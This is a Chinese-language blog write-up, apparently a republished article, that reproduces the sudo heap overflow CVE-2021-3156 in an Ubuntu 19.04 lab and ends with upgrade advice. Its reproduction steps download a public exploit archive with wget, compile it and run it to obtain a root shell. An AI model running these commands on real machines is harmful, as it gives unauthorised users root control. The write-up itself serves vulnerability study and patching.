Sudo溢出漏洞CVE-2021-3156的示例分析

发布时间:2021-12-28 20:26:30 作者:柒染
来源:亿速云 阅读:120

本篇文章给大家分享的是有关 Sudo溢出漏洞CVE-2021-3156的示例分析,小编觉得挺实用的,因此分享给大家学习,希望大家阅读完这篇文章后可以有所收获,话不多说,跟着小编一起来看看吧。

0x00简介

sudo是linux系统管理指令,是允许系统管理员让普通用户执行一些或者全部的root命令的一个工具,如halt、reboot、su等等。这样不仅减少了root用户的登录 和管理时间,同样也提高了安全性。sudo不是对shell的一个代替,它是面向每个命令的。

0x01漏洞概述

2021年01月26日,sudo被披露存在一个基于堆的缓冲区溢出漏洞(CVE-2021-3156,该漏洞被命名为“Baron Samedit”),可导致本地权限提升。

当在类Unix的操作系统上执行命令时,非root用户可以使用sudo命令来以root用户身份执行命令。由于sudo错误地在参数中转义了反斜杠导致堆缓冲区溢出,从而允许任何本地用户(无论是否在sudoers文件中)获得root权限,无需进行身份验证,且攻击者不需要知道用户密码。

0x02影响范围

sudo 1.8.2 - 1.8.31p2

sudo 1.9.0 - 1.9.5p1

0x03环境搭建

本次环境使用ubuntu19.04版本

1、官方下载地址:http://old-releases.ubuntu.com/releases/19.04/

Sudo溢出漏洞CVE-2021-3156的示例分析

2、使用Vmware虚拟机安装最小安装即可。(具体安装过程自行百度)

Sudo溢出漏洞CVE-2021-3156的示例分析

0x04漏洞复现

1、在终端输入sudo –version查看sudo版本,使用whoami查看当前用户

Sudo溢出漏洞CVE-2021-3156的示例分析

Sudo溢出漏洞CVE-2021-3156的示例分析

2、使用GitHub上的exp进行漏洞利用,使用wget或git进行下载

wget https://hub.fastgit.org/blasty/CVE-2021-3156/archive/main.zip

unzip main.zip

Sudo溢出漏洞CVE-2021-3156的示例分析

Sudo溢出漏洞CVE-2021-3156的示例分析

3、进入解压的目录,使用make编译成可执行文件

cd CVE-2021-3156-main/

make

Sudo溢出漏洞CVE-2021-3156的示例分析

4、执行编译出来的文件后面加上ubuntu执行可以看到已经是root权限了(使用Debian的系统也可以)

./sudo-hax-me-a-sandwich ubuntu

Sudo溢出漏洞CVE-2021-3156的示例分析

0x05修复建议

目前官方已在sudo新版本1.9.5p2中修复了该漏洞,请受影响的用户尽快升级版本进行防护。

下载地址:https://www.sudo.ws/download.html

Sudo溢出漏洞CVE-2021-3156的示例分析

以上就是 Sudo溢出漏洞CVE-2021-3156的示例分析,小编相信有部分知识点可能是我们日常工作会见到或用到的。希望你能通过这篇文章学到更多知识。更多详情敬请关注亿速云行业资讯频道。

推荐阅读:
  1. Metasploit溢出phpMyAdmin漏洞
  2. stack clash 和sudo 漏洞

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

sudo cve-2021-3156

上一篇:Apache Shiro认证绕过漏洞CVE-2020-17523该如何分析

下一篇:如何进行Shiro权限绕过漏洞CVE-2020-1957复现

相关阅读

您好,登录后才能下订单哦!

密码登录
登录注册
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》